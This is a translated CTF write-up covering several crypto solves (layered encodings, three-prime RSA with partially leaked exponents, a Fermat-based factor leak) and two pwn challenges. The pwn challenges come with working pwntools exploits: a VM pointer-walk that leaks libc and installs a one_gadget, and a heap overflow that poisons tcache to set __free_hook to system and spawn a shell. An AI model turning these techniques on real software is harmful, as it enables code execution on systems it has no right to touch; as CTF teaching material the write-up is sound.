
[冀信2025]雄

Just got back. I picked up the attachments and solved a few.

The challenges are somewhat worth complaining about; small competitions are all like that.

Crypto

层层叠叠 (Layer upon Layer)

We are given a piece of ciphertext; the obvious guess is some base-N encoding.

#m,n2W>w$Q&oD%Eikwf#<6+QC2Tc3vmfXP8mJ).Q$r%gDixiknrF:%u#N1$C.`@zb=G,J).9pQ&QzhESnvr)=9_RvaU&&=kRU!XbgT>o$!4H)V.ck;q*:koCk?Sr3?mMmjMJ2G[HT$1/4Hy0oU2T.8_pvaU?x@^je!XoJ(.2S8!)/Ebdk9J#<#_DZc%P3z]eqK#,Jw;_oQ&r!]xRn*fT.ux3NE

But which base? Someone else's writeup says base91 first, then "62". That "62", however, is clearly not real base62: the decoder at https://www.wqtool.com/basecode handles it differently from every other tool. It is not base62 at all, but a hex encoding whose even and odd positions (high and low nibble of each byte) are each substituted through a separate 16-character table drawn from the 0-9a-zA-Z alphabet. The solution is roughly as follows; if you have never used that site you would never guess how to decode it.

# After hex-encoding, the high nibble of each byte is taken from alphabet entries k*4 and the
# low nibble from entries k*4+1 (k = 0..15), with the alphabet 0-9a-zA-Z.
encode = lambda x: ''.join(['048cgkoswAEIMQUY'[i >> 4] + '159dhlptxBFJNRVZ'[i & 15] for i in x.encode()])
decode = lambda x: bytes(['048cgkoswAEIMQUY'.index(x[i]) * 16 + '159dhlptxBFJNRVZ'.index(x[i + 1]) for i in range(0, len(x), 2)])

After that, CyberChef handles the remaining layers automatically.
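As an added example (not the writeup's own code), here is the same scheme with the two tables derived from the 0-9a-zA-Z alphabet by the k*4 / k*4+1 rule, plus a fingerprint check that tells you whether an unknown string could even be this encoding before you feed it to the decoder. The constant names, the function names and the sample input are mine, not challenge data.

```python
import string

# The 62-character alphabet the writeup names: 0-9a-zA-Z.
ALPHABET = string.digits + string.ascii_lowercase + string.ascii_uppercase

# High nibble -> ALPHABET[k*4], low nibble -> ALPHABET[k*4+1], k = 0..15.
HI_TABLE = ALPHABET[0::4]   # '048cgkoswAEIMQUY'
LO_TABLE = ALPHABET[1::4]   # '159dhlptxBFJNRVZ'


def encode(data: bytes) -> str:
    """Each byte becomes two characters, one per nibble, each from its own table."""
    return ''.join(HI_TABLE[b >> 4] + LO_TABLE[b & 0xF] for b in data)


def decode(text: str) -> bytes:
    """Inverse of encode(); raises ValueError on characters outside the tables."""
    if len(text) % 2:
        raise ValueError("length must be even: two characters per byte")
    out = bytearray()
    for hi, lo in zip(text[0::2], text[1::2]):
        out.append((HI_TABLE.index(hi) << 4) | LO_TABLE.index(lo))
    return bytes(out)


def looks_like_nibble_substitution(text: str) -> bool:
    """Fingerprint: even positions only ever use HI_TABLE, odd positions only
    LO_TABLE.  Genuine base62 output has no such position-dependent alphabet,
    so this separates the two before you waste time on the wrong decoder."""
    return (len(text) > 0 and len(text) % 2 == 0
            and set(text[0::2]) <= set(HI_TABLE)
            and set(text[1::2]) <= set(LO_TABLE))


def demo() -> tuple:
    """Round-trip a constructed sample and fingerprint it."""
    sample = b"flag"                     # constructed sample, not challenge data
    enc = encode(sample)
    return enc, decode(enc), looks_like_nibble_substitution(enc)
```

The fingerprint is the practical takeaway: a "base62" blob whose characters split cleanly into two disjoint 16-symbol sets by position is this nibble substitution, not base62.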

*Encrypted archive

This one belongs under Misc: brute-force the 6-byte content from its CRC.

3-factor RSA

This was the big one. Last night the numbers would not come out; I brute-forced until midnight without a hit. In the morning I noticed that here c = pow(m, d, n), i.e. e and d are swapped relative to the usual usage, so I had been brute-forcing the wrong thing.

import sympy
import sys
import random

# Random bytes
csprng = random.SystemRandom()

# Least Common Multiple
def lcm(a, b):
    return a*b // sympy.gcd(a, b)

def get_random_prime(bits):
    return sympy.randprime(2**(bits-1), 2**bits)

def get_ed(phi, bits):
    while True:
        e = get_random_prime(bits)
        if sympy.gcd(e, phi) == 1:
            d = sympy.mod_inverse(e, phi)
            return (e, d)

p = get_random_prime(256)
q = get_random_prime(256)
r = get_random_prime(256)
n = p*q*r
lamda = lcm(p-1, lcm(q-1, r-1))        # Carmichael lambda, not Euler phi
(e, d) = get_ed(lamda, 48)             # e is a random 48-bit prime
print("Modulus:")
print("n: ", hex(n))
print("\ntest:")
m = get_random_prime(256)
c = pow(m, d, n)                       # note: the "encryption" uses d, the check uses e
w = pow(c, e, n)
print("m: ", hex(m))
print("c: ", hex(c))
print("w: ", hex(w))
print(m == w)
ek = (e >> 44) << 44                   # e and d with their low 44 bits cleared
dk = (d >> 44) << 44
print("ek: ", hex(ek))
print("dk: ", hex(dk))
e2 = 0x7
h = csprng.randint(1, 2**160)
flag = 'flag{' + hex(h)[2:] + '}'
a = int.from_bytes(bytes(flag, 'utf-8'), byteorder='big', signed=False)
enc = pow(a, e2, n)                    # flag encrypted under the small exponent 7
print("\nencrypted flag via small e2:")
print("e2: ", hex(e2))
print("enc: ", hex(enc))
# EOF
#------------------------------------------------
# values from the attachment
n = 0x81647fb077e9b66b6a86b700f5bed99e5139dfe7484c28a5b7a27767e53266d971a19410554a127ae034440bf2f3b902e649470cdd44524cfcd2634e55d4defd7b83497d4135a05030a548730454edc18efc7a4bbd470f8bd273dbbd8a1382f7
m = 0x861011b0af95e654458f84c57d638405319ea154501df412bba722c6768c0ff9
c = 0x6ab0554ae8513a7cdfb96ba7fc2fbc5d8ab3f872746cfbf8f06660e78f402b7c3662ef896a1cde1aa9abc2a09a3590d3619941fb8621ea51d27803ff932ec43a5005f244497a4d3b254296d1c4699a4e7e8fc0e1cadd0a192905075d66a8187a
ek = 0xe00000000000
dk = 0x1211655116c24db65ea6553aecdabc06842fc485b8c89aa08e9a974d997b0842ddd142dd6712b40adff9442a4c340567568578ebdd509fb3483532f9d1e4f78d13a9a0e447935ed58bbf262bbc799c40227bcd5a5bc312531a8800000000000
enc = 0x3773fd7f928a0231c0a26e48678984fc36db84f4d63de0cdb36a3101e6e48e140a21b6a6fae834dfaa2670d36444a5f002d28a5d4a9efb6822af43d4d98f4aa9a18139b76527049d2c4419d7ad4ddd9ef65ec7176842aa9ced2f8b14af7bf731
e = 7    # this is e2 from the generator; the 48-bit e is recovered below and overwrites it

Step 1: brute-force e and d. Both are given with their low 44 bits cleared, so use a meet-in-the-middle attack. From c = m^(dk + d1·2^23 + d2) mod n we get c · m^-dk · m^-(d1·2^23) = m^d2, so first brute-force d1 (21 bits) into a dictionary, then brute-force d2 (23 bits) and look for a match. The same split recovers e from m = c^e mod n. Building the dictionary takes about five minutes, the lookup about one; acceptable.

from tqdm import trange
from gmpy2 import invert
from Crypto.Util.number import *

# 1. MITM (meet-in-the-middle) to recover d and e
# c = m^(dk + d1*2^23 + d2)   =>   c * m^-dk * m^-(d1*2^23) = m^d2
# d: ~720 known high bits + 21 (d1) + 23 (d2)
ds = {}
c1 = c*invert(pow(m,dk,n),n)%n
for d1 in trange(1<<21):            # d1 = 0 included
    ds[c1*invert(pow(m,d1<<23,n),n)%n] = d1
for d2 in trange(1<<23):
    v = pow(m,d2,n)
    if v in ds:
        print(ds[v],d2)
        break
#1764685 1550449
d = dk+(1764685<<23)+1550449
#0x1211655116c24db65ea6553aecdabc06842fc485b8c89aa08e9a974d997b0842ddd142dd6712b40adff9442a4c340567568578ebdd509fb3483532f9d1e4f78d13a9a0e447935ed58bbf262bbc799c40227bcd5a5bc312531a88d76a697a871

# m = c^(ek + e1*2^23 + e2)   =>   m * c^-ek * c^-(e1*2^23) = c^e2
# e: 4 known high bits + 21 (e1) + 23 (e2)
es = {}
m1 = m*invert(pow(c,ek,n),n)%n
for e1 in trange(1<<21):
    es[m1*invert(pow(c,e1<<23,n),n)%n] = e1
for e2 in trange(1,1<<23,2):        # e is prime, so its low bit is set: only odd e2
    v = pow(c,e2,n)
    if v in es:
        print(es[v],e2)
        break
#412364 1118467
e = ek+(412364<<23)+1118467
#0xe32566111103
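The meet-in-the-middle above, generalised and written the way I would actually run it, as an added example rather than the writeup's own code: the per-candidate pow + invert in the dictionary loop is replaced by one modular multiplication per step, which is where most of those five minutes went. The toy modulus N_TOY (three small safe primes) and the exponent values are constructed for the demo; odd_only encodes the writeup's observation that a prime e has its low bit set.

```python
# Toy parameters (constructed): three safe primes, so any element other than
# +-1 mod each prime has order >= 509*593*641, far above the 2^16 search window.
P_TOY, Q_TOY, R_TOY = 1019, 1187, 1283
N_TOY = P_TOY * Q_TOY * R_TOY


def recover_low_bits(m, c, n, x_hi, bits, odd_only=False):
    """Return x in [x_hi, x_hi + 2**bits) with pow(m, x, n) == c, or None.

    Split x = x_hi + a*2**lo + b with hi + lo == bits.  Then
        c * m**-x_hi * m**-(a*2**lo) == m**b   (mod n),
    so tabulate the left side for every a (one modular multiply per step,
    not a fresh pow/invert), then walk b with a running power of m.
    Assumes gcd(m, n) == 1 and ord(m) > 2**bits; otherwise the match
    inside the window need not be unique.
    """
    hi = bits // 2
    lo = bits - hi
    target = c * pow(m, -x_hi, n) % n        # == m**(a*2**lo + b)
    inv_step = pow(m, -(1 << lo), n)         # == m**-(2**lo)
    table = {}
    v = target
    for a in range(1 << hi):
        table[v] = a                         # v == target * m**-(a*2**lo)
        v = v * inv_step % n
    w = 1                                    # w == m**b
    for b in range(1 << lo):
        if (not odd_only or b & 1) and w in table:
            return x_hi + (table[w] << lo) + b
        w = w * m % n
    return None


def demo():
    """Hide the low 16 bits of a constructed exponent and get them back."""
    x = 0xABCD1234                           # constructed secret exponent
    x_hi = (x >> 16) << 16                   # what the attacker is given: high bits only
    m = 2
    c = pow(m, x, N_TOY)
    return recover_low_bits(m, c, N_TOY, x_hi, 16)
```

pow(m, -k, n) needs Python 3.8 or newer; on older interpreters use gmpy2.invert as the writeup does. For the challenge values call it with bits=44 and the real (m, c, n, dk): the table then holds 2^22 entries, which is the memory/time trade-off to tune.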

Step 2: factor n. With three prime factors you have to split twice. lambda here is not phi: it is phi with the common factors of p-1, q-1, r-1 divided out, so only about 7 bits shorter, but e*d-1 is still a multiple of the order of every element mod n, so the usual "factor from e*d" method works unchanged.

import random
from math import gcd

def e_dn(e_d, n):
    """Given e*d (a multiple of lambda(n)) and n, return a nontrivial split of n."""
    k = e_d - 1
    while True:
        g = random.randint(2, n-1)
        t = k
        while True:
            if t % 2 != 0:
                break
            t = t // 2
            x = pow(g, t, n)
            if x > 1 and gcd(x-1, n) > 1:
                p = gcd(x-1, n)
                q = n // p
                return p, q

# first pull out one factor
p, q = e_dn(e*d, n)
#isPrime(q)
#q = 109739797121983322771519030468092659932965062206735686070337419153070102908023
# then split the remaining 512-bit composite
p, r = e_dn(e*d, n//q)
#p = 97924373013630812482114355821760730956021675584686065236653897693588145915951
#r = 73021559261251416915128565192581641860886519328771771653994372190887373969743

Step 3: recover the flag. q-1 has the factor 7, so 7 has no inverse modulo q-1; drop q and decrypt modulo the other two factors (the flag is a bit long, so a single 256-bit factor cannot hold it, but p*r can).

#3, RSA: e shares a factor with phi
#q-1 has the factor 7; drop q and use the other two factors
#gcd(7,q-1) == 7
# valid because the flag (47 bytes) is smaller than p*r (512 bits) and gcd(7,(p-1)*(r-1)) == 1
m = pow(enc, invert(7, (p-1)*(r-1)), p*r)
long_to_bytes(m)
#flag{618b6744a7e82e58b4a510dbb43174fac42c2cdc}
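Step 3 generalised, as an added example (not the writeup's code): for a multi-prime modulus, drop every prime p_i with gcd(e, p_i - 1) > 1, take e-th roots modulo the remaining primes, combine them with CRT, and re-encrypt under the full n to confirm the message really was small enough to fit in what remains. The toy primes, the message and the function names are constructed for the demo.

```python
from math import gcd


def crt(residues, moduli):
    """Combine x == r_i (mod m_i) for pairwise coprime m_i (Garner's method)."""
    x, mod = 0, 1
    for r, mi in zip(residues, moduli):
        t = (r - x) * pow(mod, -1, mi) % mi
        x += mod * t
        mod *= mi
    return x % mod


def decrypt_skipping_bad_primes(c, e, primes):
    """Return (m, used_primes, verified) for c = m**e mod prod(primes).

    A prime p with gcd(e, p - 1) > 1 has no unique e-th root mod p, so it is
    left out.  The CRT result equals the true message only if
    m < prod(used_primes); `verified` re-encrypts under the full modulus and
    is False when the message was too big for the primes that remain.
    """
    n = 1
    for p in primes:
        n *= p
    used, roots = [], []
    for p in primes:
        if gcd(e, p - 1) != 1:
            continue                          # x -> x**e is not a bijection mod p
        d_p = pow(e, -1, p - 1)               # private exponent modulo this prime
        roots.append(pow(c % p, d_p, p))
        used.append(p)
    if not used:
        raise ValueError("e shares a factor with every p-1; nothing to invert")
    m = crt(roots, used)
    return m, used, pow(m, e, n) == c


# Constructed toy: 29-1 = 28 is divisible by e = 7, the other two primes are fine.
TOY_PRIMES = [29, 1019, 1187]
TOY_E = 7


def demo(m):
    """Encrypt a constructed message under the toy modulus and decrypt it again."""
    c = pow(m, TOY_E, 29 * 1019 * 1187)
    return decrypt_skipping_bad_primes(c, TOY_E, TOY_PRIMES)
```

The `verified` flag is the check the writeup relies on implicitly: if the flag had been longer than p*r, the result would still decode to bytes, just the wrong ones, and only re-encryption under n exposes that.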

*FCSR

I really cannot find a solution for this one yet; to be continued.

An LFSR-like generator with an extra carry state C and a folded output; 64 MB of keystream output is given.

from random import getrandbits

bits = 80
mask = 2**bits - 1
feedback = 0xae985dff26619fc58623dc8aaf46d5903dd4254e

class Task:
    def __init__(self, key, iv):
        self.key = key
        self.iv = iv
        self.filter = feedback
        self.state = (self.iv << bits) | self.key
        self.C = 0
        S = [0] * 20
        for i in range(20):
            self.clock()
            S[i] = self.F()
        self.state = 0
        for i in range(20):
            shift = i * 8
            self.state |= (S[i] << shift)
        self.C = 0
        for _ in range(162):
            self.clock()

    def clock(self):
        tmp = self.state & 1
        if tmp:
            fb = feedback
        else:
            fb = 0
        self.state = self.state >> 1
        buffer = self.state ^ self.C
        self.C &= self.state
        self.C ^= (buffer & fb)
        buffer ^= fb
        self.state = buffer
        # author's sketch of the register:
        # |1   |[state]*| 1  |=buffer   160 bits folded to an 8-bit output
        # |   1|                        160*8

    def F(self):
        buffer = self.filter & self.state
        buffer ^= ((buffer >> 32) & 0xffffffff)
        buffer ^= ((buffer >> 64) & 0xffffffff)
        buffer ^= ((buffer >> 96) & 0xffffffff)
        buffer ^= ((buffer >> 128) & 0xffffffff)
        buffer = buffer & 0xffffffff
        buffer ^= (buffer >> 16)
        buffer ^= (buffer >> 8)
        return buffer & 0xff

    def encrypt(self, msg):
        length = len(msg)
        res = b""
        for i in range(length):
            self.clock()
            res += bytes([self.F() ^ msg[i]])
        return res

key = getrandbits(bits)
iv = getrandbits(bits)
print(key)
print(iv)
ffcsr = Task(key, iv)
f = open("hint", "wb")
for i in range(2**26):
    ffcsr.clock()
    f.write((ffcsr.F().to_bytes(1, "big")))
f.close()
flag = b"flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"
f = open("flag", "wb")
enc = ffcsr.encrypt(flag)
f.write(enc)
f.close()

Product

These were collected from various places, so it is a bit messy. This one is not from the same competition; I will just park it here, it is the only one.

from Crypto.Util.number import *
from itertools import *
from random import *
from secret import flag

m = bytes_to_long(flag)
p, q = getPrime(512), getPrime(512)
n = p*q
a = randint(0, 2**512)
b = randint(0, a)
c = randint(0, b)
d = randint(0, c)
e = 0x10001
num = [[-a, 0, a], [-b, 0, b], [-c, 0, c], [-d, 0, d]]
h = []
for _ in product(*num):
    total = sum(_)
    result = pow(total, p, n)   # total^p mod n, for every signed selection of a, b, c, d
    h.append(result)
shuffle(h)
leak = h[0:len(h)//2]
c = pow(m, e, n)
print(f'leak = {leak}')
print(f'n = {n}')
print(f"c = {c}")

The leak consists of total^p mod n for every signed combination (-x, 0, +x) of the four numbers. By Fermat's little theorem total^p ≡ total (mod p), so each leaked value is total + k·p. Adding the values for a and -a is no use: it gives exactly n, because (-a)^p ≡ -(a^p) mod n for odd p. So look instead for triples whose totals sum to zero, such as a, b and -(a+b). There is no need to search cleverly: only 40 values were leaked, so brute-force all triples and take gcd(n, sum) to get p.

from gmpy2 import gcd, invert

#a^p ≡ a (mod p)  =>  a^p mod n = a + k*p
#a^p + b^p + (-a-b)^p = k*p
for i in leak:
    for j in leak:
        for k in leak:
            p = gcd(n, i+j+k)
            if p != 1 and p != n:
                print(p)
# the flag is shorter than the 512-bit p, so decrypting modulo p alone is enough
long_to_bytes(pow(c, invert(65537, p-1), p))
#DASCTF{16953d6cc3e28a7310471e213e9752ca}
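The Fermat identity behind this solve, reproduced end to end at toy scale as an added example (not the writeup's code): build the leak the way the challenge does, show that a pair x, -x only ever yields n, and recover a factor from triples. The primes, offsets, seed and function names are constructed for the demo; gcd(n, sum) may come out as either prime, which is equally useful, and any accidental nontrivial gcd is still a true factor.

```python
from itertools import product, combinations_with_replacement
from math import gcd
import random


def build_leak(p, q, offsets, seed=1):
    """Same construction as the challenge: total**p mod n for every signed
    selection of the offsets, shuffled, half of it leaked."""
    n = p * q
    h = [pow(sum(t), p, n) for t in product(*[(-x, 0, x) for x in offsets])]
    random.Random(seed).shuffle(h)
    return h[:len(h) // 2], n


def pair_sum(p, q, x):
    """x**p + (-x)**p mod n: (-x)**p == -(x**p) for odd p, so the two leaked
    values add up to exactly n and gcd(n, n) == n tells you nothing."""
    n = p * q
    return pow(x, p, n) + pow(-x, p, n)


def recover_factor(leak, n):
    """Fermat: t**p == t (mod p).  If three totals sum to zero, so do their
    leaked values mod p, and gcd(n, sum) is a nontrivial factor.  Sums equal
    to n or 2n are skipped because their gcd is n itself."""
    for x, y, z in combinations_with_replacement(leak, 3):
        g = gcd(n, x + y + z)
        if 1 < g < n:
            return g
    return None


def demo():
    """Full toy run: leak -> factor -> decrypt modulo that factor."""
    p, q = 1019, 1187                        # constructed toy primes
    leak, n = build_leak(p, q, [100000, 55555, 7777, 333])
    e, m = 0x10001, 777                      # message smaller than either prime
    c = pow(m, e, n)
    g = recover_factor(leak, n)
    # decrypt modulo the recovered factor alone; valid because m < g
    return g, pow(c, pow(e, -1, g - 1), g)
```

combinations_with_replacement walks each unordered triple once, which cuts the writeup's 40^3 loop to 11480 gcd calls; with 512-bit values that is still instantaneous, the expensive part of the challenge is only the generator's pow(total, p, n).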

PWN

FastMachine

Since I solved this after the contest without the environment, I cannot guarantee it works against the real setup. The binary is stripped of its symbol table, which makes it some effort to read; for a 5-hour contest that is a bit unkind.

A VM challenge. Four operations matter: move the pointer backward and forward (< and >), and input and output (, and .).

Once the operations are understood it is straightforward: walk the pointer along the stack and output the __libc_start_main return address to get the libc base, then overwrite one of the handler function pointers with a one_gadget.

from pwn import *
context(arch='amd64', log_level='debug')

elf = ELF('./chall')
libc = ELF('./libc-2.27.so')
# VM opcodes used: <  >  ,  .   =  ptr--, ptr++, read one byte, write one byte, call
p = process('./chall')
#gdb.attach(p, "b*0x555555400ead\nc")

pay  = '>'*0x58 + '.>'*8             # leak libc: print 8 bytes of the __libc_start_main return address
pay += '<'*(0x58+0x28) + ',>'*8      # write fun[9] = one_gadget (the gadget needs [rsp+0x70] == 0)
pay += '>'*0x10 + ',>'*8
pay += '='                           # call one_gadget

p.sendafter(b"len> ", str(len(pay)).encode())
p.sendafter(b"code> ", pay.encode())

libc.address = u64(p.recv(8)) - 231 - libc.sym['__libc_start_main']
print(f"{libc.address = :x}")
#gdb.attach(p, "b*0x555555400ead\nc")
p.send(flat(0, libc.address + 0x10a41c))   # two 8-byte reads: a zero, then the one_gadget address
p.interactive()

'''
stack layout at the breakpoint (gdb):
00:0000│ rsp 0x7fffffffdab0 ◂— 0xd68 /* 'h\r' */
01:0008│-0b8 0x7fffffffdab8 ◂— 0x800000008
02:0010│-0b0 0x7fffffffdac0 —▸ 0x555555a01261 ◂— 0x801040104010401
03:0018│-0a8 0x7fffffffdac8 —▸ 0x7fffffffdb40 ◂— 0
04:0020│-0a0 0x7fffffffdad0 —▸ 0x555555a01280 ◂— 0
05:0028│-098 0x7fffffffdad8 —▸ 0x555555a01260 ◂— 0x104010401040104
06:0030│-090 0x7fffffffdae0 —▸ 0x555555a01280 ◂— 0
07:0038│-088 0x7fffffffdae8 —▸ 0x555555a01260 ◂— 0x104010401040104
08:0040│-080 0x7fffffffdaf0 —▸ 0x555555400e85 ◂— sub qword ptr [rbp - 0xa8], 1     <---- ptr--
09:0048│-078 0x7fffffffdaf8 —▸ 0x555555400eaf ◂— add qword ptr [rbp - 0xa8], 1     <---- ptr++
0a:0050│-070 0x7fffffffdb00 —▸ 0x555555400ed8 ◂— mov rax, qword ptr [rbp - 0xa8]   <---- one_gadget needs [rsp+0x70] == 0
0b:0058│-068 0x7fffffffdb08 —▸ 0x555555400f11 ◂— mov rax, qword ptr [rbp - 0xa8]
0c:0060│-060 0x7fffffffdb10 —▸ 0x555555400f4d ◂— mov rax, qword ptr [rbp - 0xa8]    <---- output 1 byte at ptr
0d:0068│-058 0x7fffffffdb18 —▸ 0x555555400f85 ◂— call 0x555555400950                <---- read 1 byte into ptr
0e:0070│-050 0x7fffffffdb20 —▸ 0x555555400fb9 ◂— mov rax, qword ptr [rbp - 0xa8]
0f:0078│-048 0x7fffffffdb28 —▸ 0x555555401089 ◂— mov rax, qword ptr [rbp - 0xa8]
10:0080│-040 0x7fffffffdb30 —▸ 0x5555554010fa ◂— mov rax, qword ptr [rbp - 0x90]
11:0088│-038 0x7fffffffdb38 —▸ 0x5555554010d6 ◂— mov rax, qword ptr [rbp - 0xb0]    <---- slot 9 is null; overwritten with one_gadget later
12:0090│-030 0x7fffffffdb40 ◂— 0
... ↓        3 skipped
16:00b0│-010 0x7fffffffdb60 —▸ 0x7ffff7c109a0 ◂— push rbp
17:00b8│-008 0x7fffffffdb68 ◂— 0x4338b1f13e9f0000
18:00c0│ rbp 0x7fffffffdb70 —▸ 0x7fffffffdb90 —▸ 0x555555401150 ◂— push r15
19:00c8│+008 0x7fffffffdb78 —▸ 0x55555540114b ◂— jmp 0x555555401141
1a:00d0│+010 0x7fffffffdb80 —▸ 0x7fffffffdc70 ◂— 1
1b:00d8│+018 0x7fffffffdb88 ◂— 0x4338b1f13e9f0000
1c:00e0│+020 0x7fffffffdb90 —▸ 0x555555401150 ◂— push r15
1d:00e8│+028 0x7fffffffdb98 —▸ 0x7ffff7821bf7 (__libc_start_main+231) ◂— mov edi, eax   <---- libc leak
'''

*mallocdelete

Only add and delete; I could not find the bug.

Overflow

A very standard menu challenge.

In add, the index is read without a bounds check, so it can underflow. Index -2 lands exactly on chunk 14's size slot, so storing a heap pointer there makes chunk 14's recorded length huge and edit(14) becomes an overflowing write.

The supplied libc is 2.31, which still has __free_hook, so just write system into it.

from pwn import *
context(arch='amd64', log_level='debug')

elf = ELF('./pwn1')
libc = ELF('./libc.so.6')  # 2.31-0ubuntu9.2

def add(idx, size):
    p.sendlineafter(b">> ", b'1')
    p.sendlineafter(b"idx: ", str(idx).encode())
    p.sendlineafter(b"size: ", str(size).encode())

def free(idx):
    p.sendlineafter(b">> ", b'2')
    p.sendlineafter(b"idx: ", str(idx).encode())

def edit(idx, msg):
    p.sendlineafter(b">> ", b'3')
    p.sendlineafter(b"idx: ", str(idx).encode())
    p.sendafter(b"content: ", msg)

def show(idx):
    p.sendlineafter(b">> ", b'4')
    p.sendlineafter(b"idx: ", str(idx).encode())

p = process('./pwn1')

add(14, 0)
add(0, 0x400)
add(1, 0x30)
add(2, 0x18)
add(-2, 8)                           # idx unchecked: ptr[-2] aliases size[14], so chunk 14's size becomes a heap pointer
edit(14, b'\0'*0x18 + p64(0x451))    # overflow from chunk 14 into chunk 0's size: 0x411 -> 0x451, swallowing chunk 1
free(0)                              # too big for tcache: goes to the unsorted bin, fd/bk point into main_arena
edit(14, b'A'*0x20)                  # pad up to chunk 0's fd
show(14)
p.recvuntil(b'A'*0x20)
libc.address = u64(p.recv(6) + b'\0\0') - 0x1ebbe0   # main_arena+96 in 2.31-0ubuntu9.2
print(f"{libc.address = :x}")
edit(14, b'\0'*0x18 + p64(0x451))    # restore chunk 0's size, which the padding overwrote

add(3, 0x50)                         # carved out of the unsorted chunk, right after chunk 14
add(4, 0x50)
free(4)
free(3)                              # tcache[0x60]: 3 -> 4
edit(14, flat(0, 0, 0, 0x61, libc.sym['__free_hook']))   # overflow into chunk 3: size 0x61, tcache next = __free_hook
add(3, 0x50)
add(4, 0x50)                         # this allocation returns __free_hook
edit(3, b'/bin/sh\0')
edit(4, p64(libc.sym['system']))     # __free_hook = system
#gdb.attach(p)
free(3)                              # system("/bin/sh")
p.interactive()

*SimpleDecoder

An ARM challenge, which I cannot do: a base64-like decoder first, then an overflow.

http://www.dtcms.com/a/415597.html
